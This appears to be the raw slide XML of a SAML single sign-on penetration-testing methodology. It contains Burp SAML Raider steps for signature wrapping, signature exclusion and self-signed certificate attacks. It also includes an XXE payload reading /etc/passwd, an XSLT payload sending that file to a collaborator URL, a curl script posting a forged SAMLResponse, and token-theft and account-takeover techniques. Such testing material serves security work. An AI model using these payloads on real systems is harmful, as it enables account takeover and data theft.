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Arial Black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a585d4e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a585d4e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3a91c287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3a91c287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3a91c28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3a91c28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3a91c287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3a91c287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a91c287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a91c28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3a91c287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3a91c287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3a91c287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3a91c287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3a91c287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3a91c287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505453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505453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a585d4e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a585d4e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3a91c287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3a91c287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dd021f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dd021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3a91c2879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3a91c2879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a91c2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3a91c2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3a91c287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3a91c287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3a91c287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3a91c287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3a91c287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3a91c287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3a91c287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3a91c287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xml-signature-wrapping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research.aurainfosec.io/bypassing-saml20-SSO/?lipi=urn%3Ali%3Apage%3Ad_flagship3_feed%3BxtHwFzjkSyaBXhbuvBbOYg%3D%3D" TargetMode="External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xml-signature-exclusion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research.aurainfosec.io/bypassing-saml20-SSO/?lipi=urn%3Ali%3Apage%3Ad_flagship3_feed%3BxtHwFzjkSyaBXhbuvBbOYg%3D%3D" TargetMode="External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certificate-faking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research.aurainfosec.io/bypassing-saml20-SSO/?lipi=urn%3Ali%3Apage%3Ad_flagship3_feed%3BxtHwFzjkSyaBXhbuvBbOYg%3D%3D" TargetMode="External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xml-external-entity-via-saml" TargetMode="External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hyperlink" Target="https://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html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seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted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extensible-stylesheet-language-transformation-via-saml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www.contextis.com/en/blog/xslt-server-side-injection-attacks" TargetMode="External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epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#token-recipient-confusion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://www.economyofmechanism.com/office365-authbypass.html" TargetMode="External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hyperlink" Target="https://medium.com/@th3g3nt3l/how-i-found-an-ssrf-in-yahoo-guesthouse-recon-wins-8722672e41d4" TargetMode="External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hyperlink" Target="https://twitter.com/0xInfection/status/1333815130606473218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twitter.com/intigriti/status/1275425753455366144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hyperlink" Target="https://twitter.com/NahamSec/status/1149340211307937794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twitter.com/th3g3nt3lman/status/12646421484540723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twitter.com/malcolmx0x/status/1407282357724397569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twitter.com/_ayoubfathi_/status/1041319555308707841" TargetMode="External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ompassSecurity/SAMLRaider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epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/" TargetMode="External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s://mishresec.wordpress.com/2017/10/13/uber-bug-bounty-gaining-access-to-an-internal-chat-syste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eb-in-security.blogspot.com/2015/04/on-security-of-saml-based-identity.html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blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/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s://hackerone.com/reports/1361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SSO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</a:t>
            </a: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Single Sign-On</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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8700" y="2674975"/>
            <a:ext cx="776425" cy="4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6675" y="2069600"/>
            <a:ext cx="477549" cy="50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6675" y="2976375"/>
            <a:ext cx="477549" cy="50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8125" y="2443313"/>
            <a:ext cx="1070050" cy="90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40"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="208" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5294125" y="2891051"/>
            <a:ext cx="714000" cy="4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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7100412" y="2320675"/>
            <a:ext cx="833700" cy="5919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094775" y="2898050"/>
            <a:ext cx="839100" cy="3294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Figure Out If The Server Vulnerable To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XML Signature Wrapping </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR Not ?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Intercept SAML Request With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Sent To Repeater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Switch To SAML Raider Tab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Choose XSW Number Attack e.g. XSW3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 Click On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Apply</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSW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6 - Click On Go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If The Server Vulnerable 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XML Signature Exclusion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 Not ?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Intercept SAML Request With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Sent To Repeater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Switch To SAML Raider Tab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Click On Remove Signatures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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Click On Go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If The Server C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hecks </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Identity Of The Signer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 Not ?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Intercept SAML Request With Token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Sent To Repeater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Switch To SAML Raider Tab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4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Click On Sent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Certificate To SAML Raider’s certs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5 - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Switch To SAML Raider Certificates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6 - Click On</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Save and Self-Sign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7 - Back To SAML Raider Tab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8 - Click On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Re-)Sign message</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assertion</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both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9 - Click On Go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1" name="Google Shape;361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XXE Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> At The Top Of The SAML Response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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;!DOCTYPE foo [ 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&lt;!ELEMENT foo ANY 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&lt;!ENTITY	file SYSTEM "file:///etc/passwd"&gt;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&lt;!ENTITY dtd SYSTEM "http://www.me.com/text.dtd" &gt;]&gt;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&lt;samlp:Response  ID="" &gt;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&lt;saml:Issuer&gt;&lt;/saml:Issuer&gt;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 &lt;ds:Signature &gt;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   …... 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   &amp;dtd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    …..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66" name="Google Shape;366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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSLT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nto The Transforms Element As A Child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Node</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Of The SAML Response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...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&lt;ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"&gt;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  ...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  &lt;ds:Transforms&gt;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&lt;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&gt;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&lt;xsl:template match="doc"&gt;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&lt;xsl:variable name="file" select="unparsed-text('/etc/passwd')"/&gt;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&lt;xsl:variable name="escaped" select="encode-for-uri($file)"/&gt;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&lt;xsl:variable name="attackerUrl" select="'http://id.burpcollaborator.net/'"/&gt;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&lt;xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/&gt;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&lt;xsl:value-of select="unparsed-text($exploitUrl)"/&gt;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&lt;/xsl:template&gt;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&lt;/xsl:stylesheet&gt;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  &lt;/ds:Transforms&gt;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&lt;/ds:Signature&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="750">
              <a:solidFill>
                <a:srgbClr val="00FF00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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Can Accept Tokens Issued By The Same Identity Provider That Services Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , So You Can Takeover Victim Account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As Attacker , Intercept SAML Token Response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Sent SAML Token Response To Victim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Make Victim Click On SAML Token Response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From Attacker’s Browser Try To Use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SAML Token Response Too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Testing SSO </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To search In Burp Suite About URLs In Cookie Header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 Host=IP;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If There Is Try To Change IP To Your IP To Get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r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /sso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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cookie: Host=IP-Of-Me:PORT;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RelayState=path&amp;SAMLResponse=base64(SAML-Structure)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7" name="Google Shape;407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1" name="Google Shape;41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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-129125" y="4711825"/>
            <a:ext cx="9331500" cy="462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Piniaki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18" name="Google Shape;418;p56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19" name="Google Shape;4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925" y="4854775"/>
            <a:ext cx="260625" cy="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7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7" name="Google Shape;427;p57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7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7" name="Google Shape;217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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Redirects You To SSO e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Do FUZZ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I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nternal.company.com e.g.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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3569350" y="2044550"/>
            <a:ext cx="5131200" cy="281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</a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ffuf -w wordlist.txt -u https://www.company.com/FUZZ -fc 302,404 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 sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal/FUZZ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internal.company.com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https://internal.company.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Redirects You To SSO e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Do FUZZ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On internal.company.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal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internal.company.com/internal/FUZZ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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company.com/internal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Redirects You To SSO e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google login</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To Insert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public Before internal e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company.com/public/internal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Gain Access Internal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company.com/internal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirect To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Google Login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Insert public Before internal e.g.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company.com/public/internal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Install Burp Suite Extension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SAML Raider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 Configure It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Install SAML Raider In Burp Suite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 To Generate X.509 Certificate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600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>openssl req -x509 -newkey rsa:4096 -keyout /tmp/key.pem -out cert.pem -days 365 -nodes</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:b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I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mport cert.pem Into SAML Raider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 Click On</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Save and Self-Sign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Craft SAML Request With Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Send It To The Server And Figure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Out How Server Interact With This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Craft</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SAML Request With Token In File e.g. file.xml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Create Bash File e.g. pwn.sh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#!/bin/sh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xml=`base64 file.xml`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curl -v 'https://www.company.com/sso' --data "RelayState=/path"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	--data-urlencode "SAMLResponse=$xml"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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chmod +x pwn.sh &amp;&amp; ./pwn.sh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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AssertionConsumerServiceURL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Token Request Try To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Insert Your Domain e.g. http://me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As Value To Steal The Token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Intercept SAML Request e.g.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There Is AssertionConsumerServiceURL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There Is Any Parameter Accept URL As Value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Insert http://me.com As Value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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AssertionConsumerServiceURL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Token Request Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do FUZZ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On</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Value Of AssertionConsumerServiceURL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If It Is Not Similar To Origin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Intercept SAML Request e.g.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There Is AssertionConsumerServiceURL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Assume You Origin Request Is auth.comapny.com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But The Value Of AssertionConsumerServiceURL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Is internal.company.com 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600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Try To Do FUZZ On internal.company.com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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3343600" y="4397425"/>
            <a:ext cx="4558500" cy="209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ffuf -w wordlist.txt -u https://www.company.com/FUZZ -fc 302,404 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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Any UUID , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change It To UUID Of Victim Attacker e.g. Email Of Internal Employee Or Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Account</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etc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Intercept SAML Request With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Sent To Repeater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Switch To SAML Raider Tab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Change UUID Of You To UUID Of Victim Account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6 - Click On Go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